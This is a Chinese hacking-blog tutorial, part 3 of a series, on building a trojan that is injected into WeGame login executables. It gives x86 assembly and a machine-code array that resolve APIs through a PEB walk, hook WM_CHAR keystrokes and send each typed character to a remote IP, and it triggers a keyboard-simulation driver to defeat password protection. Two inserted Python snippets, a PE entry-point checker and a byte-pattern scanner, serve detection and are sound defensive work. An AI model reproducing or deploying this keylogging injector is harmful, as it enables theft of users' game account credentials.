
Account-Stealing Trojan (Part 3)

Author: 知识与交流
Published 2021-04-02 12:01:21
Column: 黑客技术家园

Background:

In the previous post, WeGame盗号木马之旅(二) (The WeGame Account-Stealing Trojan, Part 2), we built the keyboard keystroke-simulation driver. In this post we write the code that actually gets injected.

Goal:

Write the injected code itself, and have it capture the account name and the password.

Implementation:

Two figures follow to illustrate which code this post is about:

The figure above is the infection process as a whole. The injected code written in this post is the part inside the orange box; later we will write InfectiveVirus.exe, which handles writing this code into the target EXE so that the program keeps working as usual while, at the key moment, it sends information to the server. Our injected code can be thought of as if it had always been part of the target EXE. To obtain the account name, we first install a local hook (https://msdn.microsoft.com/zh-cn/library/windows/desktop/ms644990(v=vs.85).aspx, https://blog.csdn.net/rankun1/article/details/50973190) whose callback captures messages; when a message is captured, a thread is started that creates a socket and sends the message to the server. The password side is much the same, except that the hook callback additionally checks for WM_LBUTTONDOWN: when the password box is clicked, we send a command to the driver written in the previous post, which quickly simulates keystrokes to produce the translation codebook. This is fast enough that an ordinary user does not notice. Then, when the user types the password, a thread is started and the message sent, exactly as for the account name.

I assume the reader already knows the PE format in outline. It follows that what we inject is binary machine code, not the source we write in VS and not assembly either; of course assembly and machine code are equivalent and convert directly into each other. The figure below shows the details:

Here we have only injected the code instructions (machine code) plus some parameters (strings needed for calls, function call addresses, and so on) into the target EXE, without touching the entry point. The figure below is the final version:

Now the program runs our code before its own; at the end we jmp to the original entry point and the program continues as before O(∩_∩)O. Injecting the code and patching the entry point are the job of InfectiveVirus.exe and will be covered when we develop it.

One more point: the injected code is best written directly in assembly. You can also write it in C first and then write the assembly from the disassembly (friendlier for beginners -。-!!), but in the end it must be assembly, converted to machine code. The machine code is kept in a char array inside InfectiveVirus.exe and simply memcpy'd into the target EXE. The figure shows my finished char array of machine code:

It is nothing more than the machine code of the corresponding assembly instructions.

One more note -。-。。。。 Writing this assembly is not like ordinary assembly, where you can simply call a function, e.g. call printf("我最帅!"). We know that the call instruction really sets EIP to the address of printf's first instruction, i.e. call printf("我最帅!") is turned by the compiler into call 0X66666666 (an address I made up). That address is normally kept in the PE import table (https://baijiahao.baidu.com/s?id=1590821448124371294&wfr=spider&for=pc). Put simply, the import table holds the entry addresses of every API the program uses. But our code is injected after the fact, so it cannot just call printf("我最帅!") -。-///. We therefore have to obtain the addresses of the functions our injected code uses; I keep those addresses in the injected code's data area (see one of the figures above) and then call 0X66666666 (again, made up) to invoke printf. Likewise any arguments we need, such as the string "我最帅" (as an example), are kept in the injected code's parameter area. But how do we get the function addresses? We first obtain the addresses of LoadLibraryA and GetProcAddress (https://blog.csdn.net/aidem_brown/article/details/50625482); with those two we can obtain the address of any function in any module's export table (https://blog.csdn.net/evi10r/article/details/7216467). So how do we get those two addresses? Both live in kernel32.dll, which practically every program loads. We can do the following:

1. Obtain the load base address of kernel32.dll.

2. Parse the export table of kernel32.dll.

(For details see 《计算机病毒揭秘与对抗》 and https://blog.csdn.net/mynote/article/details/387221?locationNum=10)

Then, in assembly, we can use these two functions to get the addresses of every other function we need.

Finally, the arguments. The arguments a call needs must also be written into the target EXE, because when we call printf("我最帅!"), the push "我最帅" is really push 0X88888888 (the address of the string). So we have to compute the exact address of every string ourselves. In a normal program the compiler and linker do this drudgery, but as outsiders we get no such luxury O(∩_∩)O//// Here are the entry addresses of the instruction and parameter areas of the two injected code blobs:

tgp_daemon.exe injected code, instruction base: 0x00570000

tgp_daemon.exe injected code, parameter base: 0x00571000

TASLogin.exe injected code, instruction base: 0x004F0000

TASLogin.exe injected code, parameter base: 0x004F1000

I reserved 0X2000 bytes: the first 0X1000 holds instructions and the next 0X1000 holds parameters. The PE structures of the two EXEs below make this clear. tgp_daemon.exe PE structure:

ImageBase is the load base address and SizeOfImage is the size of the whole PE image in memory; added together they give 0X00570000, because my data is appended to the end of the original EXE. The same reasoning applies to TASLogin.exe below. TASLogin.exe PE structure:
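As an added defensive example (not the article's code): the infection described above appends a block at ImageBase + SizeOfImage and moves the entry point onto it, and that layout is visible from the PE headers alone. The checker below parses the headers and flags an entry point that lies in the last section, outside every section, beyond SizeOfImage, or in a writable-and-executable section. The fixtures are constructed, header-only PE32 images that reuse the TASLogin.exe addresses from the text (original entry 0x00420148, injected entry 0x004F0000); the section name ".inj" is my placeholder.

```python
import struct

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000


def parse_pe(data):
    """Return (entry_rva, image_base, size_of_image, [(name, va, vsize, chars), ...])."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    sig, _machine, nsec = struct.unpack_from("<IHH", data, e_lfanew)
    if sig != 0x4550:
        raise ValueError("not a PE file")
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                      # IMAGE_OPTIONAL_HEADER32 follows the 24-byte file header
    entry_rva, = struct.unpack_from("<I", data, opt + 16)      # AddressOfEntryPoint
    image_base, = struct.unpack_from("<I", data, opt + 28)     # ImageBase
    size_of_image, = struct.unpack_from("<I", data, opt + 56)  # SizeOfImage
    sections = []
    for i in range(nsec):                    # 40-byte section headers follow the optional header
        name, vsize, va, *_, chars = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, chars))
    return entry_rva, image_base, size_of_image, sections


def entry_point_findings(data):
    """Header-only heuristics for an entry point that was redirected into appended code."""
    entry_rva, image_base, size_of_image, sections = parse_pe(data)
    findings = []
    if entry_rva >= size_of_image:
        findings.append("entry point 0x%08X lies beyond SizeOfImage" % (image_base + entry_rva))
    home = [i for i, (_n, va, vsize, _c) in enumerate(sections) if va <= entry_rva < va + vsize]
    if not home:
        return findings + ["entry point RVA 0x%X is outside every section" % entry_rva]
    name, _va, _vsize, chars = sections[home[0]]
    if home[0] == len(sections) - 1 and len(sections) > 1:
        findings.append("entry point is in the last section %r, not in the first code section" % name)
    if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section %r is both writable and executable" % name)
    return findings


def build_pe(sections, entry_rva, size_of_image, image_base=0x00400000):
    """Constructed header-only PE32 fixture (no code bytes); sections = [(name, va, vsize, chars)]."""
    dos = bytearray(0x40)
    dos[:2], dos[0x3C:0x40] = b"MZ", struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack("<IHHIIIHH", 0x4550, 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    for off, val in ((16, entry_rva), (28, image_base), (56, size_of_image)):
        struct.pack_into("<I", opt, off, val)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, vs, 0, 0, 0, 0, 0, c)
                     for n, va, vs, c in sections)
    return bytes(dos) + file_hdr + opt + table


CODE = 0x20 | 0x40000000 | IMAGE_SCN_MEM_EXECUTE   # CNT_CODE | MEM_READ | MEM_EXECUTE
DATA = 0x40 | 0x40000000                           # CNT_INITIALIZED_DATA | MEM_READ
# Clean layout: the original TASLogin.exe entry point 0x00420148 (RVA 0x20148) sits inside .text.
CLEAN = build_pe([(".text", 0x1000, 0x30000, CODE), (".data", 0x31000, 0xBE000, DATA)],
                 entry_rva=0x20148, size_of_image=0xF0000)
# Infected layout as described in the text: a 0x2000-byte block appended at ImageBase + SizeOfImage
# (0x004F0000) with the entry point moved onto it. The section name ".inj" is a constructed placeholder.
INFECTED = build_pe([(".text", 0x1000, 0x30000, CODE), (".data", 0x31000, 0xBE000, DATA),
                     (".inj", 0xF0000, 0x2000, CODE | IMAGE_SCN_MEM_WRITE)],
                    entry_rva=0xF0000, size_of_image=0xF2000)
```

Run entry_point_findings(INFECTED) to see the two findings for the appended block, and entry_point_findings(CLEAN) for the empty result; a real sample can be passed in as the raw file bytes.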

Here are the parameters we need; the comment on each gives its relative offset, in the same order as the code:

char cBuffer[48] = { 0 };//0
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//////////////
WCHAR pLinkName[] = L"\\\\.\\TROJAN_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450

The PROC variables hold function addresses, the char strings hold function names, and a few ints are scratch space. How are these parameters referenced from assembly? For example, to push pCreateFile from the tgp_daemon.exe injected code I write push 0X005713E8 (0X00571000 + 0X3E8), i.e. the parameter base plus the relative offset.

The code below obtains the addresses of LoadLibrary and GetProcAddress, resolves the other functions we need, installs the message hook, and finally returns to the original entry point. From here on I only show the TASLogin.exe injected code; the tgp_daemon.exe version is similar and I will not repeat it. The first line is the address of the first instruction, i.e. the address at which the machine code is written. -。-///

0x004F0000:

mov         eax,dword ptr fs:[00000030h];// get the PEB
mov         eax,dword ptr [eax+0Ch];// +0x00c Ldr : _PEB_LDR_DATA
mov         eax,dword ptr [eax+0Ch];// +0x00c first InLoadOrderModuleList : _LIST_ENTRY
mov         eax,dword ptr [eax];// +0x000 next node InLoadOrderLinks : _LIST_ENTRY
mov         eax,dword ptr [eax];// +0x000 next node InLoadOrderLinks : _LIST_ENTRY; this is KERNEL32.DLL's _LDR_DATA_TABLE_ENTRY
mov         eax,dword ptr [eax+18h];// +0x018 KERNEL32.DLL base address, DllBase : Ptr32 Void
mov         dword ptr [0X368 +0X004F1000],eax;//pKernalBase
mov         eax,dword ptr [eax+3Ch];// +0x03c e_lfanew
mov         ebx,dword ptr [0X368 +0X004F1000]
add         eax,ebx;// PE header, i.e. _IMAGE_NT_HEADERS
add         ebx,dword ptr [eax+78h];// +0x018 OptionalHeader +0x060 DataDirectory +0x000 VirtualAddress: export table VA
mov         eax,dword ptr [ebx+14h];// NumberOfFunctions
mov         dword ptr [0X360 +0X004F1000],eax;//iNamesNum
mov         ecx,dword ptr [0X368 +0X004F1000]
add         ecx,dword ptr [ebx+24h];// pNameOrdinalsTable
mov         dword ptr [0X374 +0X004F1000],ecx;//pNameOrdinals
mov         ecx,dword ptr [0X368 +0X004F1000]
add         ecx,dword ptr [ebx+20h];// pAddressOfName
mov         dword ptr [0X378 +0X004F1000],ecx;//pAddress
mov         ecx,dword ptr [0X368 +0X004F1000]
add         ecx,dword ptr [ebx+1Ch];// pAddressOfFunction
mov         dword ptr [0X37C +0X004F1000],ecx;//Function
;// resolve LoadLibrary and GetProcAddress: compare each export name against the target names, then fetch the address
push        esi;// short on registers; borrow esi for the start of the current export name
push        edi;// edi holds the start of the target name
mov         edx,0;// index into the named exports
mov         edi,dword ptr [0X378 +0X004F1000];//t1
mov         esi,dword ptr [0X368 +0X004F1000]
add         esi,dword ptr [edi+edx*4];// address of the current name string
mov         edi, 0X004F1090;// string LoadLibraryA
mov         ebx,0;// character index for the LoadLibrary comparison
mov         ecx,0;// character index for the GetProcAddress comparison
mov         ah,byte ptr [esi+ebx];//t2 fetch one byte
mov         al,byte ptr [edi+ebx]
cmp         ah,al;// compare the byte
jne         0x004F00BA;//jump T3
inc         ebx;// next character
cmp         ebx,0Dh;// end of string?
jne         0x004F0087;//jump T2
mov         ecx,dword ptr [0X374 +0X004F1000]
movzx       ecx,word ptr [ecx+edx*2];// ordinal into the address table
mov         edi,dword ptr [0X37C +0X004F1000]
mov         edi,dword ptr [edi+ecx*4];// LoadLibrary address
mov         dword ptr [0X380 +0X004F1000],edi;// save result
mov         ecx,0;// character index for the GetProcAddress comparison
mov         edi, 0X004F10C0 ;//t3 string GetProcAddress
mov         ah,byte ptr [esi+ecx];// fetch one byte
mov         al,byte ptr [edi+ecx]
cmp         ah,al;// compare the byte
jne         0x004F00ED;//jump T4
inc         ecx;// next character
cmp         ecx,0Eh;// end of string?
jne         0x004F00BA;//jump T3
mov         esi,dword ptr [0X374 +0X004F1000]
movzx       esi,word ptr [esi+edx*2];// ordinal into the address table
mov         edi,dword ptr [0X37C +0X004F1000]
mov         edi,dword ptr [edi+esi*4];// GetProcAddress address
mov         dword ptr [0X384 +0X004F1000],edi;// save result
mov         eax,dword ptr [0X380 +0X004F1000];//t4
cmp         eax,0;// have both addresses been found?
je          0x004F0105;//jump T5: keep searching while either is missing
mov         eax,dword ptr [0X384 +0X004F1000]
cmp         eax,0
je          0x004F0105;//jump T5
jmp         0x004F0112;//jump T6: both found, leave the loop
inc         edx;//t5
cmp         edx,dword ptr [0X360 +0X004F1000]
jne         0x004F0066;//jump T1
pop         edi;//t6 restore registers
pop         esi
mov         eax,dword ptr [0X368 +0X004F1000];// add the base address to both RVAs, then resolve the functions we need
mov         ebx,dword ptr [0X380 +0X004F1000]
add         ebx,eax
mov         dword ptr [0X380 +0X004F1000],ebx
mov         ebx,dword ptr [0X384 +0X004F1000]
add         ebx,eax
mov         dword ptr [0X384 +0X004F1000],ebx
push        0X004F1030;// arg: User32
call        dword ptr [0X380 +0X004F1000]
mov         dword ptr [0X36C +0X004F1000],eax
push        0X004F1060;// arg: WS2
call        dword ptr [0X380 +0X004F1000]
mov         dword ptr [0X370 +0X004F1000],eax
push        0X004F10F0;// arg: GetCurrentThreadId
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X388+0X004F1000],eax;// save
push        0X004F1120;// arg: SetWindowsHookEx
push        [0X36C+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X38C+0X004F1000],eax;// save
push        0X004F1150;// arg: CreateThread
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X390+0X004F1000],eax;// save
push        0X004F1180;// arg: CallNextHookEx
push        [0X36C+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X394+0X004F1000],eax;// save
push        0X004F11B0;// arg: WSAStartup
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X398+0X004F1000],eax;// save
push        0X004F11E0;// arg: socket
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X39C+0X004F1000],eax;// save
push        0X004F1210;// arg: htons
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3A0+0X004F1000],eax;// save
push        0X004F1270;// arg: inet_addr
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3A4+0X004F1000],eax;// save
push        0X004F12A0;// arg: connect
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3A8+0X004F1000],eax;// save
push        0X004F12D0;// arg: send
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3AC+0X004F1000],eax;// save
push        0X004F1300;// arg: closesocket
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3B0+0X004F1000],eax;// save
push        0X004F1330;// arg: WSACleanup
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3B4+0X004F1000],eax;// save
push        0X004F13E8;// arg: CreateFile
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X448+0X004F1000],eax;// save
push        0X004F1418;// arg: DeviceIoControl
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X44C+0X004F1000],eax;// save
call        dword ptr ds:[0X388+0X004F1000]
push        eax;// push the thread ID just returned
push        0x0
push        0x004F0300;// CALLBACK address
push        0x3
call        dword ptr ds:[0X38C+0X004F1000];// install the hook
mov         [0X364+0X004F1000],eax;// save the returned HHOOK
jmp         0x00420148;// jump back to the program's original entry point
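As an added detection example (not the article's code): the first instructions above read the PEB through fs:[30h] and walk Ldr -> InLoadOrderModuleList to reach kernel32, and that sequence has a stable byte encoding. The scanner below looks for it with YARA-style wildcard patterns; the pattern texts and the 16-byte window are my choices, the first sample is the opening 20 bytes of the shellcode2 array printed later in this article, and the benign sample is constructed.

```python
import re

# YARA-style hex patterns for the kernel32-locating prologue; "??" matches any one byte.
PATTERNS = {
    "mov r32, fs:[30h] (PEB via ModRM form)": "64 8B ?? 30 00 00 00",
    "mov eax, fs:[30h] (PEB, short form)": "64 A1 30 00 00 00",
    "PEB->Ldr (+0Ch) then Ldr->InLoadOrderModuleList (+0Ch)": "8B 40 0C 8B 40 0C",
}


def compile_hex_pattern(spec):
    """Turn "64 8B ?? 30" into a bytes regex; each literal byte is escaped individually."""
    parts = [b"." if tok == "??" else re.escape(bytes([int(tok, 16)])) for tok in spec.split()]
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {desc: compile_hex_pattern(spec) for desc, spec in PATTERNS.items()}


def scan(buf):
    """Return sorted (offset, description) hits for every pattern found in buf."""
    return sorted((m.start(), desc) for desc, rx in COMPILED.items() for m in rx.finditer(buf))


def peb_walk_verdict(buf, window=16):
    """True when a fs:[30h] read is followed within `window` bytes by the Ldr walk: together they
    are the PEB -> Ldr -> InLoadOrderModuleList sequence the injected code uses to find kernel32."""
    hits = scan(buf)
    peb = [off for off, desc in hits if "fs:[30h]" in desc]
    ldr = [off for off, desc in hits if desc.startswith("PEB->Ldr")]
    return any(0 < l - p <= window for p in peb for l in ldr)


# Sample 1: the first 20 bytes of the article's shellcode2 array (TASLogin.exe), copied from the page.
INJECTED_PROLOGUE = bytes([0x64, 0x8B, 0x05, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x0C,
                           0x8B, 0x40, 0x0C, 0x8B, 0x00, 0x8B, 0x00, 0x8B, 0x40, 0x18])
# Sample 2: constructed benign bytes (an ordinary stack-frame prologue, two argument loads, epilogue).
BENIGN = bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x40, 0x53, 0x56, 0x57, 0x8B, 0x45, 0x08,
                0x8B, 0x4D, 0x0C, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3])

if __name__ == "__main__":
    for off, desc in scan(INJECTED_PROLOGUE):
        print("0x%04X  %s" % (off, desc))
    print("PEB walk:", peb_walk_verdict(INJECTED_PROLOGUE), "/ benign:", peb_walk_verdict(BENIGN))
```

The ModRM pattern leaves the register byte as a wildcard, so it also catches the same read into ebx, ecx and so on; a full-file scan only needs scan(open(path, "rb").read()).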

Below is the hook callback in assembly. It mainly checks whether the message is WM_CHAR and, if so, starts a thread to send the character; and whether the left mouse button was pressed, in which case it starts a thread that runs the keystroke simulation to obtain the codebook (the tgp_daemon.exe injected code does not need this part):

0x004F0300:
push        ebp
mov         ebp,esp
sub         esp,0C0h
push        ebx
push        esi
push        edi
lea         edi,[ebp-0C0h]
mov         ecx,30h
mov         eax,0CCCCCCCCh
rep stos    dword ptr es:[edi]
mov         eax,dword ptr [ebp+0x10];// pMsg
mov         ebx,dword ptr [eax+4];// message
cmp         ebx,102h;// WM_CHAR: is it a character message?
jne         0x004F0351;//jump T1
mov         al, [eax+0x8];// wParam
mov         byte ptr [0X004F1000+0X0],al;// store the byte in the buffer
push        0
push        0
lea         eax,[0X004F1000+0X0];// buffer address
push        eax
push        0x004F03C0;// thread entry: opens a socket and sends the data
push        0
push        0
call        dword ptr [0X004F1000+0X390];//CreateThread
mov         eax,dword ptr [ebp+0x10];// pMsg
mov         ebx,dword ptr [eax+4];// message  T1
cmp         ebx,201h;// WM_LBUTTONDOWN: left click?
jnz         0x004F0374;//jump T3
push        0
push        0
push        0
push        0x004F0480;// thread entry: runs the keyboard driver simulation
push        0
push        0
call        dword ptr [0X004F1000+0X390];//CreateThread
push        dword ptr [ebp+0x10];//T3
push        dword ptr [ebp+0xC]
push        dword ptr [ebp+0x8]
push        dword ptr [0X004F1000+0x364];//gHook
call        dword ptr [0X004F1000+0x394];//CallNextHookEx
pop         edi
pop         esi
pop         ebx
mov         esp,ebp
pop         ebp
ret         0Ch

Below is the assembly that creates the socket and sends the message:

0x004F03C0:
push        ebp
mov         ebp,esp
sub         esp,40h
push        ebx
push        esi
push        edi
lea         eax,[ebp-1D0h]
push        eax
push        202h
call        dword ptr [0X004F1000+0x398];//WSAStartup
push        0
push        1
push        2
call        dword ptr [0X004F1000+0X39C];//socket
mov         dword ptr [ebp-8],eax;// save the socket locally
mov         eax,2
mov         word ptr [ebp-20h],ax
push        1A0Ah
call        dword ptr [0X004F1000+0X3A0];//htons
mov         word ptr [ebp-1Eh],ax
push        0X004F1240;// IP
call        dword ptr [0X004F1000+0X3A4];//inet_addr
mov         dword ptr [ebp-1Ch],eax
push        10h;// sizeof sockaddr
lea         eax,[ebp-20h];// sockaddr address
push        eax
mov         eax,dword ptr [ebp-8]
push        eax
call        dword ptr [0X004F1000+0X3A8];//connect
cmp         eax,0
jne         0X004F0437;//jump
push        0
push        1;// send length
push        dword ptr [ebp+8];// buffer address
mov         eax,dword ptr [ebp-8]
push        eax
call        dword ptr [0X004F1000+0x3AC];//send
mov         eax,dword ptr [ebp-8];//t1
push        eax
call        dword ptr [0X004F1000+0X3B0];//closesocket
call        dword ptr [0X004F1000+0X3B4];//WSACleanup
pop         edi
pop         esi
pop         ebx
mov         esp,ebp
pop         ebp
ret         4

Below is the assembly that starts the driver's keystroke simulation (not needed in the tgp_daemon.exe injected code):

0x004F0480:
push        ebp
mov         ebp,esp
sub         esp,0C0h
push        ebx
push        esi
push        edi
push        0
push        80h
push        3
push        0
push        3
push        0xC0000000
push        0X004F13B8;// driver symbolic link name
call        [0X004F1000+0X448];//CreateFile: open the driver
push        0
push        0x004F1450;// output buffer for the driver's reply
push        0
push        0
push        0
push        0
push        0
push        eax
call        [0X004F1000+0X44C];//DeviceIoControl: send the start command
pop         edi
pop         esi
pop         ebx
mov         esp,ebp
pop         ebp
ret         4

Writing the assembly is not the end of it; it still has to be converted into machine code, as follows:

// injected code (TASLogin.exe)
char shellcode2[] = {
 0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
 0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
 0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
 0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
 0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
 0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
 0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
 0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
 0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
 0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
 0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
 0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
 0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
 0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
 0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
 0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
 0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
 0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
 0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
 0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
 0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
 0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
 0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
 0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
 0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
 0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
 0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
 0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
 0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
 0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
 0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
 0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
 0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
 0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
 0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
 0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
 0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
 0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
 0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
 0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
 0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
 0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
 0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
 0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
 0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
